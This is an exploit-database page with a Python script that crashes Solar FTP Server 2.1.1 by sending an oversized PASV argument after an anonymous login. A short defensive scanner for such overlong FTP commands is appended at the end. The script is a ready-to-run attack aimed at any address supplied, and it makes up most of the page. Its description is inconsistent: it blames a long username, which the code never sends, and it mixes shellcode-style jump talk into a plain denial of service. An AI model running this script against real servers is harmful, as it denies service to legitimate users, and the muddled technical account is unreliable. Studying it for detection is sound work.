Solar FTP 2.1.1 PASV - Denial of Service - DoS

2024.02.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: 404

#!/usr/bin/python
# Exploit Title: Solar FTP Server 2.1.1 PASV Command - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 31 January 2024
# Vendor Homepage: N/A
# Download to demo:
# Notification vendor: Not reported
# Tested Version: Solar FTP Server 2.1.1
# Tested on: Windows XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Video:

# 1. Description
# This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
# For this exploit I have tried several strategies to increase reliability and performance:
# Jump to a static 'call esp'
# Backwards jump to code a known distance from the stack pointer.
# The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.
# When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
# Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

import socket, sys, time, struct

if len(sys.argv) < 2:
    print("[-]Usage: %s <ip addr> " % sys.argv[0])
    sys.exit(0)

ip = sys.argv[1]
if len(sys.argv) > 2:
    platform = sys.argv[2]

ret = struct.pack('<L', 0x7C9572D8)  # works when the server is on 192.168.133.128
padding = b"\x43" * 468
junk = b"\x43" * 1532
frontpad = b"\x41" * 100 + b"\xeb\x30" + b"\x41" * 21
payload = frontpad + ret + padding + junk

print("[+] Solar FTP 2.1.1 PASV - Denied of Service - DoS \n[+] Author: Fernando Mengali\n")
print("[+] Connecting to " + ip)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, 21))
except socket.error:
    print("[-] Connection to " + ip + " failed!")
    sys.exit(0)

print("[+] Exploiting")
print("[*] Sending payload to command PASV...")

# Log in, then send PASV followed by the oversized argument
s.send(b"USER anon\r\n")
s.recv(1024)
s.send(b"PASS anon\r\n")
s.recv(1024)
s.send(b"PASV " + payload + b"\r\n")
print("[+] Done - Exploited")
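A defender-side check for the pattern the script above relies on, as an added example that is not part of the original advisory: RFC 959 defines PASV without an argument, so a PASV line carrying kilobytes of data is anomalous on its face. The function names, the 512-byte line ceiling and the sample stream are assumptions constructed for illustration.

```python
"""Flag anomalous FTP control-channel lines (added example, not from the advisory)."""

# RFC 959 commands defined without an argument; PASV is the one used above.
NO_ARG_COMMANDS = {"PASV", "PWD", "QUIT", "NOOP", "SYST", "CDUP", "ABOR", "REIN"}
MAX_LINE = 512  # assumed ceiling for one command line; tune to the server's real limit


def inspect_line(raw: bytes):
    """Return (verb, findings) for one client command line, CRLF already removed."""
    findings = []
    if len(raw) > MAX_LINE:
        findings.append("overlong")
    verb, _, arg = raw.partition(b" ")
    # Cap the verb so a line with no space cannot flood the alert text.
    verb_s = verb[:8].decode("ascii", "replace").upper()
    if verb_s in NO_ARG_COMMANDS and arg.strip():
        findings.append("unexpected-argument")
    return verb_s, findings


def scan_stream(data: bytes):
    """Scan a reassembled client-to-server byte stream; return one alert per bad line."""
    alerts = []
    # A truncated capture may lack the final CRLF; the tail is still inspected.
    for raw in data.split(b"\r\n"):
        if not raw:
            continue
        verb, findings = inspect_line(raw)
        if findings:
            alerts.append((verb, len(raw), findings))
    return alerts


# Constructed sample: a normal login, then PASV followed by inert filler bytes.
SAMPLE = b"USER anon\r\nPASS anon\r\nPASV " + b"A" * 2125 + b"\r\nQUIT\r\n"

if __name__ == "__main__":
    for verb, size, findings in scan_stream(SAMPLE):
        print(f"ALERT verb={verb} bytes={size} findings={','.join(findings)}")
```

The same two rules can be enforced inline by an FTP-aware proxy, which would drop the line before it reaches the server's command parser.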


Copyright 2024, cxsecurity.com